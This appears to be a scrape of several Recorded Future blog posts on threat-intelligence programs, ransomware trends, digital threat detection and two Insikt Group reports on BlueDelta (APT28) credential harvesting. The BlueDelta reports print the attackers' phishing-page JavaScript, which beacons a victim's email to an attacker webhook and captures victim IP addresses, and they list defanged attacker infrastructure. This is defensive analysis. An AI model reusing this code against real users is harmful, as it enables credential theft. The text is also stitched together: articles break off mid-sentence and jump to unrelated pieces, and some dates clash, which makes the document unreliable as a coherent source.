Intelligence drives better decisions. High-performing teams use threat intelligence not just for detection, but to inform strategic business decisions and communicate risk to leadership.
Maturity means efficiency. Advanced programs focus on automation, high-fidelity indicators, and cross-functional collaboration—freeing analysts to concentrate on strategic initiatives.
Information overload is the top challenge. Teams need better integrations and AI-powered tools to transform massive data volumes into actionable insights.
AI will reshape the analyst role. While junior analysts won't be replaced, their workflows will evolve significantly as AI augments their capabilities.
Recorded Future recently hosted two webinars to unpack key insights from the 2025 State of Threat Intelligence Report and hear directly from customers who are putting these findings into practice.
Based on survey responses from 615 cybersecurity executives and practitioners, the report showed clear industry trends. Threat intelligence spending is up, with 76% of organizations spending over $250,000 annually and 91% planning to increase spending in 2026. Even more critically, 87% said they expect to advance the maturity of their threat intelligence programs over the next two years.
But what does maturity actually look like in practice? Our customers offered candid perspectives on how they're turning intelligence into impact.
Intelligence as a strategic asset
Our webinar panelists noted that the availability of rich threat intelligence has transformed how their organizations approach decision-making. According to Jack Watson, Senior Threat Intelligence Analyst at Global Payments, “Understanding that one alert opened and one alert closed does not necessarily equate to one single adversary being stopped” has led his team to take “a much more holistic approach to looking at problems.”
Omkar Nimbalkar, Senior Manager of Cyber Threat Research and Intelligence at Adobe, said, “Once you start doing this work day in and day out, you uncover patterns in your environment. You uncover what your posture looks like, where your true risk resides, and you can use that as a means to inform the business on the changing threat landscape for better decision-making.”
Ryan Boyero, Recorded Future’s Senior Customer Success Manager, said context and storytelling are key benefits of threat intelligence. “You can have a precursor or malicious activity that has occurred,” he said, “but without threat intelligence, you can’t really tell the story or paint the picture to deliver to senior leadership in order to help make the best and informed decisions possible.”
How threat intelligence delivers organization-wide value
Nimbalkar said his team provides tailored threat intelligence to business units and product teams across Adobe so they can monitor for specific behavioral activities and block specific threats in their environments.
Boyero shared that Recorded Future customers in EMEA use threat intelligence to educate leadership. “We're able to inform leaders,” he said. “We're able to speak with executives, get them in the room, not so much scare them that a situation could happen or has happened, but ultimately just educate and let them know that this is what Recorded Future is able to do and how we can bring success to the table.”
Erich Harbowy, Security Intelligence Engineer at Superhuman, said that in addition to educating leaders about risk, his team also uses threat intelligence to show the value of their work. “Not only am I using this very current news, I am also using the statistics that come along with that,” he said. “How much damage occurred during the first attack that was similar to this? And are [my adversaries] done? Are they coming back?”
Harbowy appreciates Recorded Future for providing those insights for postmortems and follow-ups with executives. “How do I prove my worth?” he said. “Give me the intel.”
The anatomy of a mature threat intelligence program
According to Nimbalkar, maturity comes when the foundational tactical and operational work is complete. He said that advancing a threat intelligence program is all about efficiency and optimization, including making sure you have high-fidelity indicators so your noise-to-signal ratio is reduced and you have higher-quality detections, understanding who your adversaries are and how they’re targeting you, getting in front of stakeholders and engaging with cross-functional teams, and collecting metrics on everything you do.
“Once you have figured out all these workflows, automated as much as you can, optimized and made it efficient, and then you focus more on risk reduction across the environment and more on strategic initiatives, that’s a very good maturation,” he said.
Jack Watson of Global Payments described threat intelligence maturity as the ability to ingest and action intelligence. “It’s never been easier to ingest data, but it’s also never been harder to sift through [that data]. So we’re seeing more mature organizations developing automated workflows, developing custom capabilities to do collection and action, and using AI in unique ways.”
Pathways to advancing maturity
Nick Rainho, Senior Intelligence Consultant at Recorded Future, said that the key to advancing maturity is having solid intelligence requirements. “Especially if you’re working with limited resources, go for the low-hanging fruit and ensure that the intelligence you’re pulling in is relevant to senior leadership’s priorities.”
Ryan Boyero agreed that maturity success is predicated on understanding leadership’s key requirements. “And then, how are we able to work towards that greater good and define success together?”
Top challenges for CTI teams
The panelists agreed that information overload is a critical challenge for today’s CTI teams. “More data is better than less,” said Watson, “but you have to be able to whittle it down or it’s useless.”
Nimbalkar said that with new tools in the market, advancements in AI, and the exponential growth in the volume of data, teams need vendors that can provide better integration to make data more actionable. And Rainho agreed, calling for better out-of-the-box integrations between intelligence tools so security teams can consume intelligence in the location and manner that works best for them.
Looking to the future of threat intelligence
When asked how they think the threat landscape will evolve and how technology will evolve with it, the panelists shared a number of predictions. They believe AI will enable CTI teams to fight AI-powered threats at scale. Third-party risk management will become an even more critical discipline for proactive defense. Digital threats will continue to outpace physical threats. And while junior analysts won’t be replaced by AI, their jobs will look very different as they use AI to augment their workflows.
The analysis cut-off date for this report was September 11, 2025
Executive Summary
Between February and September 2025, Recorded Future’s Insikt Group identified multiple credential-harvesting campaigns conducted by BlueDelta, a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). This activity represents an expansion of BlueDelta’s ongoing credential-theft operations previously detailed in Insikt Group’s December 2025 report.
Insikt Group identified BlueDelta targeting a small but distinct set of victims during its 2025 credential-harvesting activity. Targets included individuals linked to a Turkish energy and nuclear research agency, as well as staff affiliated with a European think tank and organizations in North Macedonia and Uzbekistan. The use of Turkish-language and regionally targeted lure material suggests that BlueDelta tailored its content to increase credibility among specific professional and geographic audiences. These selections reflect a continued interest in organizations connected to energy research, defense cooperation, and government communication networks relevant to Russian intelligence priorities.
BlueDelta’s credential-harvesting pages impersonated a range of legitimate webmail and VPN services, including Microsoft Outlook Web Access (OWA), Google, and Sophos VPN portals. Each page replicated authentic login interfaces and redirected victims to legitimate websites after they submitted their credentials, thereby reducing suspicion. The campaigns relied heavily on free hosting and tunneling services, such as Webhook[.]site, InfinityFree, Byet Internet Services, and ngrok, to host phishing content, capture user data, and manage redirections. Several pages also incorporated legitimate PDF lure documents to enhance realism and evade automated detection.
BlueDelta’s consistent abuse of legitimate internet service infrastructure demonstrates the group’s continued reliance on disposable services to host and relay credential data. These campaigns underscore the GRU’s sustained commitment to credential harvesting as a low-cost, high-yield method of collecting information that supports Russian intelligence objectives.
Key Findings
BlueDelta expanded its credential-harvesting operations throughout 2025, deploying new campaigns themed as Microsoft Outlook Web Access (OWA), Google, and Sophos VPN login portals.
The group leveraged a combination of free hosting and tunneling services, including Webhook[.]site, InfinityFree, Byet Internet Services, and ngrok, to host credential-harvesting pages and exfiltrate stolen data.
Multiple campaigns incorporated legitimate PDF lure documents, such as publications from the Gulf Research Center and the EcoClimate Foundation, to increase the appearance of authenticity and bypass email security controls.
BlueDelta used customized JavaScript functions to capture credentials, track victim activity, and automate redirection to legitimate websites, reducing manual setup and increasing operational efficiency.
Targeted email addresses and redirection behavior suggest BlueDelta focused on researchers and institutions in Türkiye and Europe, aligning with Russia’s broader intelligence-gathering priorities.
Background
BlueDelta is a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Russian Federation's Armed Forces (GRU). Also known as APT28, Fancy Bear, and Forest Blizzard, the group has carried out credential-harvesting and espionage operations for more than a decade. This campaign overlaps with activity previously attributed by Insikt Group to BlueDelta, which multiple Western governments attribute with high confidence to the GRU.
Since at least the mid-2000s, BlueDelta has conducted phishing and credential-theft operations against a wide range of targets, including government institutions, defense contractors, weapons suppliers, logistics companies, and policy think tanks. These efforts aim to collect credentials and intelligence relevant to Russia’s military operations and strategic interests. Previously reported activity focused on Microsoft Outlook, UKR.NET, and other webmail services, using fake login portals hosted on free web infrastructure and compromised routers to capture usernames, passwords, and authentication codes.
Technical Analysis
Between February and September 2025, Insikt Group analyzed a series of credential-harvesting campaigns attributed to BlueDelta. These campaigns demonstrate continued refinement of BlueDelta’s spearphishing tradecraft, with the group adopting new lure themes, multi-stage redirection chains, and enhanced credential-harvesting mechanisms. Each campaign abused free hosting and tunneling services to host malicious content and relay harvested data, reflecting BlueDelta’s persistent use of low-cost, easily disposable infrastructure.
Microsoft OWA Credential Harvesting
On February 6, 2025, BlueDelta deployed a new credential-harvesting page themed as a Microsoft Outlook Web Access (OWA) login page, as shown in Figure 1.
Figure 1: OWA login-themed credential-harvesting page (Source: Recorded Future)
BlueDelta employed the link-shortening service ShortURL for the first-stage redirection, using the URL hxxps://shorturl[.]at/Be4Xe. The shortened link redirected victims to a second stage, which was hosted using the free API service Webhook[.]site, via the URL hxxps://webhook[.]site/e8ae3bbd-ab02-46b7-b84c-f5f4baa5d7c7. BlueDelta has regularly used Webhook[.]site for credential harvesting and phishing in recent campaigns.
The initial webhook in this campaign differs from those previously reported by Inskit Group; instead of hosting the credential-harvesting page, it uses HTML to load a PDF lure document into the victim's browser for two seconds before redirecting to a second webhook, as per Figure 2.
Figure 2:HTML used to display a PDF lure on the victim's browser (Source: Recorded Future)
The PDF lure document, shown in Figure 3, is a legitimate report published by the Saudi Arabia-based think tank Gulf Research Center (GRC), entitled “Strategic and Political Implications for Israel and Iran: The Day After War.”
Figure 3:Legitimate GRC PDF lure used by BlueDelta in credential harvesting (Source: Recorded Future)
After the PDF lure has displayed for two seconds, the page redirects to a second webhook located at the URL hxxps://webhook[.]site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4, which hosts a spoofed OWA login page as shown in Figure 1. The page's structure is very similar to that of previous BlueDelta credential-harvesting pages, but the theme has been updated to represent a login page rather than a password reset page.
As shown in Figure 4, BlueDelta has added a new hidden HTML form element used to store the current page's URL. The HTML element is populated using JavaScript at page load, as shown in Figure 5, and is later used to capture victim information when the page opens and credentials are submitted. This update reduces BlueDelta's administrative burden by eliminating the need for manual addition of the exfiltration URL to credential-harvesting pages.
Figure 4:Hidden HTML form element populated using the page URL at page load (Source: Recorded Future)
<script>
const urlParams = new URLSearchParams(window.location.search);
const user = urlParams.get('u');
document.getElementById('username').value = user;
document.getElementById('href').value = window.location.href;
var xhr = new XMLHttpRequest();
xhr.open('POST', document.getElementById('href').value);
xhr.setRequestHeader('Content-Type', 'application/json');
xhr.send(JSON.stringify({"page_opened": user}));
window.history.pushState({}, document.title, '/owa/');
</script>
Figure 5:JavaScript used to capture the current URL, set a hidden form element, send a “page-opened” beacon, and change the displayed URL in the victim's browser (Source: Recorded Future)
The stored URL is then used as the destination of a page-opened beacon, which collects the victim's email address from the query string parameter “u=” and sends it in JSON format back to the webhook. The webhook additionally captures the victim's IP address and user agent. After the page URL has been saved and the page-opened beacon sent, BlueDelta modifies the page URL to /owa/ to imitate a legitimate OWA login page.
When the HTML form is submitted, a JavaScript function named myFunction captures the entered username and password and sends them via an HTTP POST request to the hidden form element’s webhook. The page is then redirected to the GRC PDF hosted on the GRC website after a one-second delay, as shown in Figure 6.
Declining payments, evolving tactics: Ransomware groups made less money in 2025 despite a 47% increase in publicly reported attacks, pushing them to adopt new approaches to extract payment, namely, DDoS-as-a-Service offerings, insider recruitment, and gig worker exploitation.
Insider threats are rising: With stolen credentials, vulnerability exploitation, and phishing still dominating initial access, ransomware operators are increasingly turning to native English speakers to recruit corporate insiders—a trend likely to accelerate if layoffs continue into 2026.
Global expansion underway: Recorded Future predicts 2026 will mark the first year that new ransomware actors operating outside Russia outnumber those within it, reflecting the rapid globalization of the ransomware ecosystem.
The ransomware paradox: More attacks, less money
By most accounts, ransomware groups made less money in 2025 than in 2024, both in overall payments and average payment size. This occurred despite a significant increase in attack volume: according to Recorded Future Intelligence, publicly reported attacks rose to 7,200 in 2025 compared to 4,900 in 2024, demonstrating a 47% increase.
For context, Recorded Future classifies both encryption attacks and data theft attacks with an extortion component under the ransomware umbrella. While exact numbers are difficult to isolate, approximately 50% of all attacks we track fall into the data theft and extortion category.
This declining profitability is driving ransomware groups to expand and evolve their tactics. Here are three trends organizations should prepare for heading into 2026.
Trend 1: DDoS services return to the RaaS model
With affiliates earning less and many ransomware operators abandoning the Ransomware-as-a-Service (RaaS) model to operate independently, remaining RaaS operations must offer more value to attract and retain affiliates. One increasingly common differentiator: bundled DDoS services.
The newly formed Chaos ransomware group (distinct from the older group of the same name) exemplifies this trend, providing DDoS capabilities to all affiliates. While this tactic isn't new—for example, REvil previously offered similar services—it fell out of favor for a period. Now, with fewer ransom payments to share, RaaS operators are reintroducing premium services to maintain their affiliate networks.
What this means for defenders: Organizations should ensure their DDoS mitigation strategies account for attacks that may accompany ransomware incidents. The pressure tactics are becoming multi-pronged.
Trend 2: Insider recruitment attempts are accelerating
Stolen credentials, vulnerability exploitation, and phishing remain by far the most common initial access vectors for ransomware groups, with social engineering as a distant but growing fourth method. However, there has been a notable increase in ransomware groups working with native English speakers to recruit corporate insiders.
The most public example came earlier this year when a ransomware group attempted to recruit a reporter at the BBC. But this represents only the visible tip of a larger trend. Private reporting indicates that insider recruitment attempts increased significantly throughout 2025 and will likely continue growing, especially if workforce reductions at major companies persist into 2026.
What this means for defenders: Insider threat programs should be evaluated and strengthened. Employee awareness training should address the possibility of external recruitment attempts, and organizations should monitor for anomalous access patterns that could indicate insider-facilitated attacks.
Trend 3: Gig workers as unwitting attack vectors
According to a recent FBI advisory, ransomware groups have begun exploiting gig work platforms to carry out attacks when remote methods fail. In one documented case, an attacker successfully executed a social engineering help desk scam but couldn't install their tools remotely due to security controls. Their solution: recruiting a gig worker through a legitimate platform to physically enter corporate offices and steal data.
The gig worker was unaware they were working for hackers, believing they were performing a legitimate IT task. The targeted employee thought they were assisting someone from the help desk. While this attack vector remains rare, the accessibility and global reach of gig work platforms means other groups could replicate this approach with minimal effort.
What this means for defenders: Physical security protocols should account for social engineering scenarios involving legitimate-looking third parties. Verification procedures for on-site IT work deserve renewed scrutiny.
Looking ahead: One big prediction for 2026
The ransomware ecosystem has seen tremendous growth among actors and groups operating outside of Russia.
Recorded Future believes that 2026 will be the first year the number of new ransomware actors outside Russia exceeds those emerging within it. This doesn't indicate a decline in Russian-based operations; instead, it reflects how dramatically the global ransomware ecosystem has expanded.
The bottom line: Strengthen your ransomware defenses
Understanding emerging ransomware tactics is the first step toward defending against them. To stay ahead of threat actors and protect your organization:
Explore Recorded Future'sRansomware Mitigation Solution for end-to-end visibility into your ransomware exposure across the attack lifecycle.
Read our latestInsikt Group® research on ransomware trends, threat actor TTPs, and emerging attack vectors.
Digital threats now originate far beyond the perimeter. Identity exposure, brand impersonation, and attacker coordination across the open, deep, and dark webs create risks that traditional tools cannot detect early enough.
Context is the foundation of effective detection. Raw alerts and isolated indicators offer little clarity. Real-time intelligence turns noise into actionable insight.
Modern digital threat detection (DTD) requires visibility across the external digital environment. The earliest warning signs of ransomware, credential theft, and phishing campaigns appear long before internal alerts fire.
Analysts need automation to keep pace. High alert volumes and false positives overwhelm SOC teams. Automated enrichment, correlation, and prioritization significantly reduce investigation time and alert fatigue.
Recorded Future operationalizes intelligence at enterprise scale. The Intelligence GraphⓇ, Digital Risk Protection, and deep SIEM/SOAR/EDR integrations deliver immediate context, organization-specific visibility, and unified detections, improving time-to-detect, time-to-contain, and overall resilience.
Why Digital Threat Detection Requires a New Approach
Today’s cyber threats evolve too quickly and appear across too many digital touchpoints for isolated tools or static detection rules to keep up. SOC teams must contend with:
High alert volumes from SIEM, EDR, cloud telemetry, identity systems, and external sources.
Evolving adversary techniques, including automated attacks and infrastructure that changes by the hour.
Expanding attack surfaces driven by SaaS adoption, third-party dependencies, social platforms, and cloud-native architectures.
Alert fatigue from manually sifting through noise to find high-risk signals.
As a result, organizations often struggle to distinguish meaningful threats from the constant noise of daily security events.
Digital threat detection (DTD) addresses this challenge by shifting focus from isolated internal signals to continuous identification, analysis, and prioritization of threats across an organization’s entire digital ecosystem. Unlike traditional perimeter-focused detection, which relies on firewalls, antivirus, and static rules, DTD recognizes that modern threats originate from external infrastructure, supply chains, cloud environments, identities, brand assets, and the open web.
The shift from reactive, point-in-time monitoring toward a proactive, intelligence-led model gives defenders the context they need to understand not just what is happening, but why it’s happening and what to do next. This article will serve as a comprehensive guide for security professionals, defining DTD and exploring the essential tools, methodologies, and practices required to build a proactive and intelligent security program.
Leaked credentials and account takeover attempts (stolen identities)
Compromised identities are now the most common entry point for attackers. Credentials harvested from stealer logs, breach dumps, or phishing toolkits often circulate online long before defenders know they’re exposed.
Brand impersonation, domain spoofing, and phishing campaigns
Attackers increasingly weaponize an organization’s public presence and create look-alike domains, fraudulent social profiles, or cloned websites to exploit user trust. These impersonation campaigns often serve as the launchpad for credential harvesting, malware delivery, and social engineering operations.
Vulnerability exploitation and zero-day threats in the external attack surface
Public-facing assets such as web applications, cloud workloads, exposed services, and third-party integrations are constantly probed for misconfigurations and unpatched vulnerabilities.
Dark web chatter and early warning signs of planned ransomware or DDoS attacks
Long before a ransomware deployment or DDoS attack hits production systems, signals often surface in underground communities. Threat actors discuss tools, trade access, or signal interest in specific industries and regions.
Why an Intelligence-Driven Approach is Better
For years, security programs centered their detection efforts on internal activity: log anomalies, endpoint alerts, authentication failures, and other signals that only appear after an attacker is already inside the environment. This approach is inherently reactive. It reveals what is happening within your systems, but not what is forming outside your walls or who may be preparing to target you next.
Digital threat detection reverses that model. Instead of waiting for internal symptoms of compromise, it looks outward at the behaviors and infrastructure, and intent of adversaries operating across the broader digital ecosystem. This expanded perspective allows teams to identify threats earlier in the kill chain, sometimes before any malicious activity reaches corporate networks.
The real advantage comes from context. Raw data on its own is ambiguous: an IP address, a file hash, a domain registration. With intelligence layered on top, those fragments become meaningful. Context exposes intent, and intent enables defenders to prioritize, escalate, or respond with precision rather than guesswork.
Essential Digital Threat Detection Tools and Technologies
Modern digital threat detection depends on a collection of tools that work together to surface early warning signals and provide the context you need to validate threats quickly.
Threat Intelligence Platforms: The Engines of Context
No human team can manually aggregate, cross-reference, and analyze the amount of threat data emerging across the web every minute. A modern threat intelligence platform automates this work, transforming massive volumes of raw, unstructured information into intelligence that analysts can act on immediately.
Threat intelligence platforms collect data from a wide range of external sources and standardize it into a usable format. Sources include:
Open web reporting
Underground forums
Dark web marketplaces
Malware sandboxes
Threat feeds
Researcher data
Once the data is normalized, the platform enriches it with context, such as:
Relationships between indicators
Associations with known threat actors
Infrastructure reuse
Activity targeting specific industries or regions
This enrichment process turns isolated artifacts into a coherent picture of adversary behavior, revealing intent, relevance, and potential impact in ways raw data alone cannot.
Security Orchestration, Automation, and Response (SOAR)
While threat intelligence provides the context needed to understand potential risks, SOAR platforms help teams take action on that intelligence quickly and consistently. These tools automate routine tasks that would otherwise consume analyst time, ensuring that high-priority threats receive attention without delay.
Key SOAR capabilities include:
Enriching alerts with additional context from internal systems (SIEM, EDR, IAM, cloud telemetry)
Blocking malicious indicators across firewalls, endpoints, cloud environments, and identity systems
Initiating takedown workflows for harmful domains or impersonation infrastructure
Coordinating actions across multiple security tools to ensure a unified response
Documenting each step of the investigation for reporting and compliance
By automating the mechanics of response, SOAR platforms allow analysts to focus on higher-value decision making rather than repetitive execution, reducing dwell time and improving overall response efficiency.
Endpoint Detection and Response (EDR) & Security Information and Event Management (SIEM) Integration
EDR and SIEM platforms provide the internal vantage point of a digital threat detection program.
EDR monitors activity directly on endpoints, capturing details such as running processes, file modifications, and other behaviors that may indicate compromise on individual devices. SIEM systems, by contrast, collect and correlate logs from across the entire environment, including authentication systems, cloud services, applications, and network devices.
Together, these tools create a continuous stream of telemetry that reveals what is happening inside the organization, from process activity and login events to cloud logs and network traffic. When this internal data is correlated with intelligence about adversary infrastructure, active campaigns, or malicious tooling observed in the wild, EDR and SIEM can separate routine activity from signs of actual threats.
Modern platforms increasingly apply AI and machine learning to enhance this capability. Instead of relying solely on static signatures or predefined rules, they learn normal behavior across users and systems and identify subtle deviations that signal compromise.
Overcoming the Analyst’s Biggest Pain Points
Today’s threat landscape places enormous pressure on analysts. Internal alerts arrive faster than they can investigate them, and the earliest indicators of an attack often originate in places no traditional tool monitors.
The Drain of Alert Fatigue and False Positives
High alert volumes are a major driver of analyst burnout. Much of the day is spent triaging notifications with little context, forcing analysts to manually determine which events represent real threats and which are routine activity. The repetitive, high-stakes nature of this work is exhausting and increases the likelihood that critical signals will be missed.
The only reliable way to cut through this noise is to improve the quality of context surrounding each alert. When telemetry is paired with intelligence that explains adversary intent, infrastructure, and behavior, analysts can immediately see which signals matter and which can be safely deprioritized.
The Blind Spots of External Risk
Much of the activity that signals an impending attack happens beyond the reach of traditional security monitoring. Early warning signs often surface on the deep and dark webs, in criminal marketplaces, inside closed forums, and across fast-moving social platforms.
These external environments are frequently where the most actionable signals appear first. Credential dumps, access sales, discussions about targeting specific industries, and the creation of malicious infrastructure often occur long before any internal alert fires. Without insight into this external ecosystem, organizations are effectively blind to the earliest stages of an attack. And monitoring these spaces manually is nearly impossible at scale.
Recorded Future: Operationalizing Digital Threat Intelligence at Scale
Recorded Future’s approach to digital threat detection delivers real-time intelligence at enterprise scale, closing the visibility gaps that make modern detection so difficult and giving you the context you need, the moment you need it.
Real-Time Context from the Intelligence GraphⓇ
The Intelligence GraphⓇ addresses the fragmentation of global threat data, one of the most persistent challenges in modern security operations. Threat activity unfolds across millions of sources, including:
Open web
Dark web marketplaces
Malware repositories
Technical feeds
Network telemetry
Closed underground forums
No analyst team could manually track, interpret, and connect this information at the speed attackers operate. The Intelligence GraphⓇ solves this problem by continuously indexing and analyzing this vast ecosystem in real time. It structures billions of data points into clear relationships among threat actors, infrastructure, malware families, vulnerabilities, and targeted industries. Because these connections are made automatically, the platform can deliver immediate, decision-ready context on any indicator.
Comprehensive Digital Risk Protection for External Threats
Real-time context helps analysts understand what a threat is and who is behind it. But detection isn’t only about interpreting indicators; it's also about discovering specific threats against your organization across the broader internet.
Recorded Future’s Digital Risk Protection (DRP) solution focuses on the same external spaces where global threat activity occurs, but applies a different lens: it monitors those environments for anything tied to your brand, domains, executives, or employees. This targeted approach ensures you see early signals of impersonation, credential theft, or emerging attacks long before they reach your internal systems.
Accelerating Time-to-Action through Integrated Intelligence
Recorded Future accelerates detection and response by delivering high-fidelity intelligence directly into the tools analysts already rely on.
An extensive ecosystem of pre-built integrations and flexible APIs connect directly with every major SIEM, SOAR, and EDR platform. These integrations feed enriched threat context, dynamic Risk Scores, and prioritized intelligence into the tools analysts already use.
Collective InsightsⓇ adds a layer of visibility that other tools cannot provide. It consolidates detections from across your SIEM, EDR, SOAR, IAM, and other security platforms into a single view, then enriches them with high-fidelity Recorded Future intelligence.
This approach connects internal alerts to one another and exposes relationships that would remain hidden when each tool operates in isolation. By identifying MITRE ATT&CK® tactics, techniques and procedures (TTPs) and attributing malware, it surfaces attack patterns you can only see from an aggregated view.
Smarter, Faster Security Decisions
Recorded Future delivers the automated, contextual intelligence needed to identify risks the moment they emerge and empower teams to respond with confidence.
By unifying internal telemetry with real-time global threat insight and organization-specific targeting data, the platform enables smarter prioritization, faster action, and dramatically less noise.
These intelligence-driven workflows directly improve core detection metrics such as time-to-detect (TTD) and time-to-contain (TTC), giving organizations a measurable way to demonstrate progress and strengthen operational resilience.
Strengthen your security program and move toward intelligence-driven operations with confidence. Explore how Recorded Future can support your Digital Threat Detection strategy.
The analysis cut-off date for this report was July 30, 2025
Executive Summary
Between June 2024 and April 2025, Recorded Future’s Insikt Group identified a sustained credential-harvesting campaign targeting users of UKR.NET, a widely used Ukrainian webmail and news service. The activity is attributed to the Russian state-sponsored threat group BlueDelta (also known as APT28, Fancy Bear, and Forest Blizzard). This campaign builds on BlueDelta’s earlier operations detailed in the May 2024 Insikt Group report “GRU’s BlueDelta Targets Key Networks in Europe with Multi-Phase Espionage Campaigns,” which documented GRU-linked credential theft and espionage activity. While this campaign does not reveal specific targets, BlueDelta’s historical focus on credential theft to enable intelligence collection provides strong indicators of likely intent to collect sensitive information from Ukrainian users in support of broader GRU intelligence requirements.
Insikt Group observed BlueDelta deploy multiple credential-harvesting pages themed as UKR.NET login portals. The group leveraged free web services, including Mocky, DNS EXIT, and later, proxy tunneling platforms such as ngrok and Serveo, to collect usernames, passwords, and two-factor authentication codes. BlueDelta distributed PDF lures containing embedded links to these credential-harvesting pages, likely to bypass automated email scanning and sandbox detections. The tools, infrastructure choices, and bespoke JavaScript used in this report are consistent with BlueDelta’s established tradecraft and have not been observed in use by other Russian threat groups.
BlueDelta’s continued abuse of free hosting and anonymized tunneling infrastructure likely reflects an adaptive response to Western-led infrastructure takedowns in early 2024. The campaign highlights the GRU’s persistent interest in compromising Ukrainian user credentials to support intelligence-gathering operations amid Russia’s ongoing war in Ukraine.
Key Findings
BlueDelta maintained a consistent focus on UKR.NET users, continuing its long-running credential-harvesting activity throughout 2024 and 2025.
The group distributed malicious PDF lures that linked to credential-harvesting pages through embedded URLs, enabling it to evade common email filtering and sandbox detection techniques.
BlueDelta transitioned from compromised routers to proxy tunneling platforms, such as ngrok and Serveo, to relay credentials and bypass CAPTCHA and two-factor authentication challenges.
Activity between March and April 2025 revealed updates to BlueDelta’s multi-tier infrastructure, including new tier-three and previously unseen tier-four components, indicating increased operational layering and sophistication.
The campaign demonstrates continued refinement of BlueDelta’s credential-theft operations, reflecting the GRU’s sustained focus on collecting Ukrainian user credentials for intelligence purposes.
Background
BlueDelta is a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Russian Federation’s Armed Forces (GRU). Also known as APT28, Fancy Bear, and Forest Blizzard, the group has conducted credential-harvesting and espionage operations for more than a decade. The activity detailed in this report aligns with previous BlueDelta campaigns tracked by Insikt Group and consistently attributed by multiple Western governments to the GRU.
Since at least the mid-2000s, BlueDelta has conducted phishing and credential-theft operations against a wide range of targets, including government institutions, defense contractors, weapons suppliers, logistics firms, and policy think tanks. These efforts aim to collect credentials and intelligence relevant to Russia’s military operations and strategic interests. Previously reported activity focused on UKR.NET and other webmail services using fake login portals hosted on free web infrastructure and compromised routers to capture usernames, passwords, and authentication codes.
Technical Analysis
On June 14, 2024, Insikt Group identified a new BlueDelta credential harvesting page, themed as a UKR.NET login page, as shown in Figure 1. The page was hosted using the free API service Mocky, which BlueDelta used regularly for most of its credential harvesting pages throughout 2024.
Figure 1:The credential harvesting page displayed a UKR.NET login page (Source: Recorded Future)
The malicious UKR.NET page had very similar functionality to that previously observed by Insikt Group. The page used JavaScript to exfiltrate credentials and relay CAPTCHA information to the domain and fixed a high port combination, kfghjerrlknsm[.]line[.]pm[:]11962, as per Figure 2.
Figure 2:UKR.NET credential capture page JavaScript (Source: Recorded Future)
The line[.]pm apex domain is owned by the free hosting company DNS EXIT, which offers free subdomain hosting.
At the time of analysis, the domain resolved to the IP address 18[.]157[.]68[.]73, which is an Amazon Elastic Compute Cloud (EC2) instance suspected of being used by the globally distributed reverse proxy service ngrok. ngrok offers a free service that enables users to connect servers behind a firewall to a proxy server and expose that server to the internet without changing firewall rules. In this instance, the service is likely being abused by BlueDelta to mask the true location of its upstream infrastructure.
The use of ngrok represents a notable change in BlueDelta’s infrastructure, as the threat group previously used compromised Ubiquiti routers to host Python scripts that captured credentials and handled 2FA and CAPTCHA challenges. This change is likely a response to efforts by the Federal Bureau of Investigation (FBI), National Security Agency (NSA), US Cyber Command, and international partners to dismantle BlueDelta's infrastructure in early 2024.
BlueDelta added new functionality to the page hosted on kfghjerrlknsm[.]line[.]pm to capture victim IP addresses using the free HTTP request and response API service HTTPBin, as shown in Figure 3.
var respIP=$.getJSON('hxxps://httpbin[.]org/ip');
Figure 3:Credential harvest page JavaScript, used to capture the victim's IP address (Source: Recorded Future)
Two additional credential harvesting pages were discovered in July and September 2024 that matched the configuration of the first page but used different Mocky URLs, with one of the pages configured to use a different port number. This is likely due to BlueDelta setting up a new ngrok tunnel.
On September 13, 2024, Insikt Group identified a new UKR.NET credential harvesting page, which was again hosted on Mocky. For this page, BlueDelta exfiltrated credentials and relayed CAPTCHA information to the domain 5ae39a1b39d45d08f947bdf0ee0452ae[.]serveo[.]net.
The apex domain serveo[.]net is owned by Serveo, a company that offers free remote port forwarding services similar to ngrok.
In October and November 2024, Insikt Group identified three new UKR.NET-themed credential harvesting pages. Again, these pages were hosted using Mocky and were constructed with similar JavaScript to the previously reported pages. However, in the latest pages, BlueDelta moved upstream credential capture and relay functionality back to ngrok, using the custom DNS EXIT domain jkbfgkjdffghh[.]linkpc[.]net, configured with two separate fixed high ephemeral ports: 10176 and 17461. At the time of analysis, the linkpc[.]net domain resolved to suspected ngrok IP address 3[.]67[.]15[.]169.
Additionally, BlueDelta added new first-stage redirection domains for two of the pages: ukraine[.]html-5[.]me and ukrainesafe[.]is-great[.]org. It is likely that the threat actors added this extra step to hide Mocky URLs in phishing emails. The apex domains html-5[.]me and is-great[.]org are owned by the free hosting company Byet Internet Services.
On December 27, 2024, Insikt Group identified a new BlueDelta UKR.NET credential harvesting page hosted on the Mocky URL run[.]mocky[.]io/v3/72fa0a52-6e6e-43ad-b1c2-4782945d6050. The malicious UKR.NET page had very similar functionality to the previously detailed pages. The page used JavaScript to exfiltrate credentials and relay CAPTCHA information to the same DNS EXIT domain, with an updated fixed port, jkbfgkjdffghh[.]linkpc[.]net:17461, as shown in Figures 4 and 5.
Figure 4:JavaScript functions and variables containing the linkpc[.]net domain (Source: Recorded Future)
Figure 5:JavaScript code used to capture credentials (Source: Recorded Future)
During the analysis of this credential harvesting page, Insikt Group detected over twenty linked PDF files, which BlueDelta likely sent to victims as phishing lures. The PDF lure document, as shown in Figure 6, informs the target of suspicious activity on their UKR.NET account and requests that they click a link to reset their password.
Figure 6:PDF lure used by BlueDelta to entice victims to click links leading to credential harvesting pages
(Source: Recorded Future)
Each of the PDFs included a hyperlink to a credential harvesting page. Most of these links were either shortened using link-shortening services or used a domain registered through a free hosting provider. Since 2023, BlueDelta has used the following link-shortening platforms:
doads[.]org
in[.]run
t[.]ly
tiny[.]cc
tinyurl[.]com
linkcuts[.]com
In addition to link-shortening services, BlueDelta has employed free domains from the hosting provider InfinityFree or from Byet Internet Services, or subdomains provided by the free blogging platform Blogger (formerly Blogspot) for tier-two link redirection, in conjunction with link-shortening services. The following apex domains have been used in BlueDelta campaigns since 2023:
Fraud enables cyber operations: Threat actors used compromised payment cards validated through Chinese-operated card-testing services to attempt unauthorized access to Anthropic's AI platform during a reported state-sponsored espionage campaign.
Card testing signals downstream attacks: The observed fraud followed a predictable kill chain—compromise, validation, resale, and attempted cashout—providing early warning indicators that preceded the final malicious transaction.
Recorded Future’s take: Proactive fraud intelligence prevents broader threats. Tester merchant intelligence can identify compromised cards before they're used for high-value fraud or to support advanced threat actor operations.
